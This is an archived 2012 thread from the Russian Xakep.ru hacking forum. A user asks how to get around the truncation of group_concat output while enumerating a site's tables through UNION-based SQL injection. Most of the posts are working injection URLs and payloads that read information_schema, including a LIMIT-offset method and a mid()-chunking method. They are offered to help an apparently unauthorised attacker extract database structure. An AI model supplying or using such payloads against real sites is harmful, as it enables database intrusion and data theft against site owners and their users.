Добро пожаловать! Это — архивная версия форумов на «Хакер.Ru». Она работает в режиме read-only.
 
журналы новости статьи video форум подписка на «Хакер»

sql inj есть вопрос.

Пользователи, просматривающие топик: none

Зашли как: Guest
Все форумы >> [Уязвимости] >> sql inj есть вопрос.
Имя
Сообщение << Старые топики   Новые топики >>
sql inj есть вопрос. - 2012-03-30 22:00:05.560000   
_duplex

Сообщений: 61
Оценки: 0
Присоединился: 2012-02-22 19:29:14.026666
 Доброго времени суток, вопрос про sql.
Версия: 5.1.39
Вот такой командой я достаю имена таблиц:
http://www.site.php?id=1+union+all+select+1,2,3,4,group_concat(table_name),6,7,8+from+information_schema.tables+where+table_schema=database()-- но дело в том что все имена не помещаются в одну строку и он мне выводит:
.......44,item10045,item10046,i Overview (точки написал я, там идут имена таблиц)
В общем как сделать что б он мне показал все таблицы??
Post #: 1
RE: sql inj есть вопрос. - 2012-03-31 09:28:20.923333   
Sрam

Сообщений: 2863
Оценки: 372
Присоединился: 2009-01-16 15:23:43.276666
 Гмм А в смысле не помещаются?
На Экране?
В сорце нет куска?
Или что?
Post #: 2
RE: sql inj есть вопрос. - 2012-03-31 14:20:36.410000   
_duplex

Сообщений: 61
Оценки: 0
Присоединился: 2012-02-22 19:29:14.026666
 Нет, на экране они может и поместились бы, просто он не выводит ее полностью, ну то есть в строке стоит как бы ограничение на количество выводимых символов.
Post #: 3
RE: sql inj есть вопрос. - 2012-03-31 15:32:01.913333   
SONIZUMZUM

Сообщений: 6
Оценки: 0
Присоединился: 2011-05-08 16:12:33.573333
 Spam, оставь свои контакты!
Post #: 4
RE: sql inj есть вопрос. - 2012-03-31 15:53:56.476666   
GothX

Сообщений: 263
Оценки: 20
Присоединился: 2011-06-22 13:27:08.173333
 _duplex, выводи таблицы по одной:
http://www.site.php?id=1+union+all+select+1,2,3,4,table_name,6,7,8+from+information_schema.tables+where+table_schema=database()+limit+1,1-- Вторая таблица:
http://www.site.php?id=1+union+all+select+1,2,3,4,table_name,6,7,8+from+information_schema.tables+where+table_schema=database()+limit+2,1-- И так далее.
Post #: 5
RE: sql inj есть вопрос. - 2012-03-31 18:01:49.883333   
_duplex

Сообщений: 61
Оценки: 0
Присоединился: 2012-02-22 19:29:14.026666
 Большое спасибо, GothX.
Post #: 6
RE: sql inj есть вопрос. - 2012-04-01 05:20:09.046666   
r1dex

Сообщений: 304
Оценки: 0
Присоединился: 2008-12-09 01:55:32.130000
quote:

Вторая таблица:


Тогда уж 3-яя =)

Можно и так:

mid(group_concat(concat_ws(0x3a,table_name)separator+0x3c62723e1f1f),1,1024)

mid(group_concat(concat_ws(0x3a,table_name)separator+0x3c62723e1f1f),100,1024)

и т.д.
Post #: 7
Страниц:  [1]
Все форумы >> [Уязвимости] >> sql inj есть вопрос.







Связаться:
Вопросы по сайту / xakep@glc.ru

Предупреждение: использование полученных знаний в противозаконных целях преследуется по закону.